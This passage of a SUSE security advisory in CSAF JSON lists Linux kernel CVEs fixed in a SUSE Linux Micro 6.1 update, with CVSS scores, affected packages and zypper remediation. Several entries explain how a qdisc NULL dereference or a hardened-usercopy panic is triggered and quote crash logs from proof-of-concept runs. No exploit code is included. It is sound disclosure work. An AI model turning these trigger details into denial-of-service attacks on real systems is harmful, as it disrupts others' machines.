"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71163",
"url": "https://www.suse.com/security/cve/CVE-2025-71163"
},
{
"category": "external",
"summary": "SUSE Bug 1257215 for CVE-2025-71163",
"url": "https://bugzilla.suse.com/1257215"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-71163"
},
{
"cve": "CVE-2026-22976",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-22976"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/sched: sch_qfq: Fix NULL deref when deactivating inactive aggregate in qfq_reset\n\n`qfq_class-\u003eleaf_qdisc-\u003eq.qlen \u003e 0` does not imply that the class\nitself is active.\n\nTwo qfq_class objects may point to the same leaf_qdisc. This happens\nwhen:\n\n1. one QFQ qdisc is attached to the dev as the root qdisc, and\n\n2. another QFQ qdisc is temporarily referenced (e.g., via qdisc_get()\n/ qdisc_put()) and is pending to be destroyed, as in function\ntc_new_tfilter.\n\nWhen packets are enqueued through the root QFQ qdisc, the shared\nleaf_qdisc-\u003eq.qlen increases. At the same time, the second QFQ\nqdisc triggers qdisc_put and qdisc_destroy: the qdisc enters\nqfq_reset() with its own q-\u003eq.qlen == 0, but its class\u0027s leaf\nqdisc-\u003eq.qlen \u003e 0. Therefore, the qfq_reset would wrongly deactivate\nan inactive aggregate and trigger a null-deref in qfq_deactivate_agg:\n\n[ 0.903172] BUG: kernel NULL pointer dereference, address: 0000000000000000\n[ 0.903571] #PF: supervisor write access in kernel mode\n[ 0.903860] #PF: error_code(0x0002) - not-present page\n[ 0.904177] PGD 10299b067 P4D 10299b067 PUD 10299c067 PMD 0\n[ 0.904502] Oops: Oops: 0002 [#1] SMP NOPTI\n[ 0.904737] CPU: 0 UID: 0 PID: 135 Comm: exploit Not tainted 6.19.0-rc3+ #2 NONE\n[ 0.905157] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.17.0-0-gb52ca86e094d-prebuilt.qemu.org 04/01/2014\n[ 0.905754] RIP: 0010:qfq_deactivate_agg (include/linux/list.h:992 (discriminator 2) include/linux/list.h:1006 (discriminator 2) net/sched/sch_qfq.c:1367 (discriminator 2) net/sched/sch_qfq.c:1393 (discriminator 2))\n[ 0.906046] Code: 0f 84 4d 01 00 00 48 89 70 18 8b 4b 10 48 c7 c2 ff ff ff ff 48 8b 78 08 48 d3 e2 48 21 f2 48 2b 13 48 8b 30 48 d3 ea 8b 4b 18 0\n\nCode starting with the faulting instruction\n===========================================\n 0:\t0f 84 4d 01 00 00 \tje 0x153\n 6:\t48 89 70 18 \tmov %rsi,0x18(%rax)\n a:\t8b 4b 10 \tmov 0x10(%rbx),%ecx\n d:\t48 c7 c2 ff ff ff ff \tmov $0xffffffffffffffff,%rdx\n 14:\t48 8b 78 08 \tmov 0x8(%rax),%rdi\n 18:\t48 d3 e2 \tshl %cl,%rdx\n 1b:\t48 21 f2 \tand %rsi,%rdx\n 1e:\t48 2b 13 \tsub (%rbx),%rdx\n 21:\t48 8b 30 \tmov (%rax),%rsi\n 24:\t48 d3 ea \tshr %cl,%rdx\n 27:\t8b 4b 18 \tmov 0x18(%rbx),%ecx\n\t...\n[ 0.907095] RSP: 0018:ffffc900004a39a0 EFLAGS: 00010246\n[ 0.907368] RAX: ffff8881043a0880 RBX: ffff888102953340 RCX: 0000000000000000\n[ 0.907723] RDX: 0000000000000000 RSI: 0000000000000000 RDI: 0000000000000000\n[ 0.908100] RBP: ffff888102952180 R08: 0000000000000000 R09: 0000000000000000\n[ 0.908451] R10: ffff8881043a0000 R11: 0000000000000000 R12: ffff888102952000\n[ 0.908804] R13: ffff888102952180 R14: ffff8881043a0ad8 R15: ffff8881043a0880\n[ 0.909179] FS: 000000002a1a0380(0000) GS:ffff888196d8d000(0000) knlGS:0000000000000000\n[ 0.909572] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n[ 0.909857] CR2: 0000000000000000 CR3: 0000000102993002 CR4: 0000000000772ef0\n[ 0.910247] PKRU: 55555554\n[ 0.910391] Call Trace:\n[ 0.910527] \u003cTASK\u003e\n[ 0.910638] qfq_reset_qdisc (net/sched/sch_qfq.c:357 net/sched/sch_qfq.c:1485)\n[ 0.910826] qdisc_reset (include/linux/skbuff.h:2195 include/linux/skbuff.h:2501 include/linux/skbuff.h:3424 include/linux/skbuff.h:3430 net/sched/sch_generic.c:1036)\n[ 0.911040] __qdisc_destroy (net/sched/sch_generic.c:1076)\n[ 0.911236] tc_new_tfilter (net/sched/cls_api.c:2447)\n[ 0.911447] rtnetlink_rcv_msg (net/core/rtnetlink.c:6958)\n[ 0.911663] ? __pfx_rtnetlink_rcv_msg (net/core/rtnetlink.c:6861)\n[ 0.911894] netlink_rcv_skb (net/netlink/af_netlink.c:2550)\n[ 0.912100] netlink_unicast (net/netlink/af_netlink.c:1319 net/netlink/af_netlink.c:1344)\n[ 0.912296] ? __alloc_skb (net/core/skbuff.c:706)\n[ 0.912484] netlink_sendmsg (net/netlink/af\n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-22976",
"url": "https://www.suse.com/security/cve/CVE-2026-22976"
},
{
"category": "external",
"summary": "SUSE Bug 1257035 for CVE-2026-22976",
"url": "https://bugzilla.suse.com/1257035"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2026-22976"
},
{
"cve": "CVE-2026-22977",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-22977"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: sock: fix hardened usercopy panic in sock_recv_errqueue\n\nskbuff_fclone_cache was created without defining a usercopy region,\n[1] unlike skbuff_head_cache which properly whitelists the cb[] field.\n[2] This causes a usercopy BUG() when CONFIG_HARDENED_USERCOPY is\nenabled and the kernel attempts to copy sk_buff.cb data to userspace\nvia sock_recv_errqueue() -\u003e put_cmsg().\n\nThe crash occurs when: 1. TCP allocates an skb using alloc_skb_fclone()\n (from skbuff_fclone_cache) [1]\n2. The skb is cloned via skb_clone() using the pre-allocated fclone\n[3] 3. The cloned skb is queued to sk_error_queue for timestamp\nreporting 4. Userspace reads the error queue via recvmsg(MSG_ERRQUEUE)\n5. sock_recv_errqueue() calls put_cmsg() to copy serr-\u003eee from skb-\u003ecb\n[4] 6. __check_heap_object() fails because skbuff_fclone_cache has no\n usercopy whitelist [5]\n\nWhen cloned skbs allocated from skbuff_fclone_cache are used in the\nsocket error queue, accessing the sock_exterr_skb structure in skb-\u003ecb\nvia put_cmsg() triggers a usercopy hardening violation:\n\n[ 5.379589] usercopy: Kernel memory exposure attempt detected from SLUB object \u0027skbuff_fclone_cache\u0027 (offset 296, size 16)!\n[ 5.382796] kernel BUG at mm/usercopy.c:102!\n[ 5.383923] Oops: invalid opcode: 0000 [#1] SMP KASAN NOPTI\n[ 5.384903] CPU: 1 UID: 0 PID: 138 Comm: poc_put_cmsg Not tainted 6.12.57 #7\n[ 5.384903] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.16.3-0-ga6ed6b701f0a-prebuilt.qemu.org 04/01/2014\n[ 5.384903] RIP: 0010:usercopy_abort+0x6c/0x80\n[ 5.384903] Code: 1a 86 51 48 c7 c2 40 15 1a 86 41 52 48 c7 c7 c0 15 1a 86 48 0f 45 d6 48 c7 c6 80 15 1a 86 48 89 c1 49 0f 45 f3 e8 84 27 88 ff \u003c0f\u003e 0b 490\n[ 5.384903] RSP: 0018:ffffc900006f77a8 EFLAGS: 00010246\n[ 5.384903] RAX: 000000000000006f RBX: ffff88800f0ad2a8 RCX: 1ffffffff0f72e74\n[ 5.384903] RDX: 0000000000000000 RSI: 0000000000000004 RDI: ffffffff87b973a0\n[ 5.384903] RBP: 0000000000000010 R08: 0000000000000000 R09: fffffbfff0f72e74\n[ 5.384903] R10: 0000000000000003 R11: 79706f6372657375 R12: 0000000000000001\n[ 5.384903] R13: ffff88800f0ad2b8 R14: ffffea00003c2b40 R15: ffffea00003c2b00\n[ 5.384903] FS: 0000000011bc4380(0000) GS:ffff8880bf100000(0000) knlGS:0000000000000000\n[ 5.384903] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n[ 5.384903] CR2: 000056aa3b8e5fe4 CR3: 000000000ea26004 CR4: 0000000000770ef0\n[ 5.384903] PKRU: 55555554\n[ 5.384903] Call Trace:\n[ 5.384903] \u003cTASK\u003e\n[ 5.384903] __check_heap_object+0x9a/0xd0\n[ 5.384903] __check_object_size+0x46c/0x690\n[ 5.384903] put_cmsg+0x129/0x5e0\n[ 5.384903] sock_recv_errqueue+0x22f/0x380\n[ 5.384903] tls_sw_recvmsg+0x7ed/0x1960\n[ 5.384903] ? srso_alias_return_thunk+0x5/0xfbef5\n[ 5.384903] ? schedule+0x6d/0x270\n[ 5.384903] ? srso_alias_return_thunk+0x5/0xfbef5\n[ 5.384903] ? mutex_unlock+0x81/0xd0\n[ 5.384903] ? __pfx_mutex_unlock+0x10/0x10\n[ 5.384903] ? __pfx_tls_sw_recvmsg+0x10/0x10\n[ 5.384903] ? _raw_spin_lock_irqsave+0x8f/0xf0\n[ 5.384903] ? _raw_read_unlock_irqrestore+0x20/0x40\n[ 5.384903] ? srso_alias_return_thunk+0x5/0xfbef5\n\nThe crash offset 296 corresponds to skb2-\u003ecb within skbuff_fclones:\n - sizeof(struct sk_buff) = 232 - offsetof(struct sk_buff, cb) = 40 -\n offset of skb2.cb in fclones = 232 + 40 = 272 - crash offset 296 =\n 272 + 24 (inside sock_exterr_skb.ee)\n\nThis patch uses a local stack variable as a bounce buffer to avoid the hardened usercopy check failure.\n\n[1] https://elixir.bootlin.com/linux/v6.12.62/source/net/ipv4/tcp.c#L885\n[2] https://elixir.bootlin.com/linux/v6.12.62/source/net/core/skbuff.c#L5104\n[3] https://elixir.bootlin.com/linux/v6.12.62/source/net/core/skbuff.c#L5566\n[4] https://elixir.bootlin.com/linux/v6.12.62/source/net/core/skbuff.c#L5491\n[5] https://elixir.bootlin.com/linux/v6.12.62/source/mm/slub.c#L5719",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-22977",
"url": "https://www.suse.com/security/cve/CVE-2026-22977"
},
{
"category": "external",
"summary": "SUSE Bug 1257053 for CVE-2026-22977",
"url": "https://bugzilla.suse.com/1257053"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2026-22977"
},
{
"cve": "CVE-2026-22978",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-22978"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: avoid kernel-infoleak from struct iw_point\n\nstruct iw_point has a 32bit hole on 64bit arches.\n\nstruct iw_point {\n void __user *pointer; /* Pointer to the data (in user space) */\n __u16 length; /* number of fields or size in bytes */\n __u16 flags; /* Optional params */\n};\n\nMake sure to zero the structure to avoid disclosing 32bits of kernel data\nto user space.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-22978",
"url": "https://www.suse.com/security/cve/CVE-2026-22978"
},
{
"category": "external",
"summary": "SUSE Bug 1257227 for CVE-2026-22978",
"url": "https://bugzilla.suse.com/1257227"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2026-22978"
},
{
"cve": "CVE-2026-22984",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-22984"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nlibceph: prevent potential out-of-bounds reads in handle_auth_done()\n\nPerform an explicit bounds check on payload_len to avoid a possible\nout-of-bounds access in the callout.\n\n[ idryomov: changelog ]",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
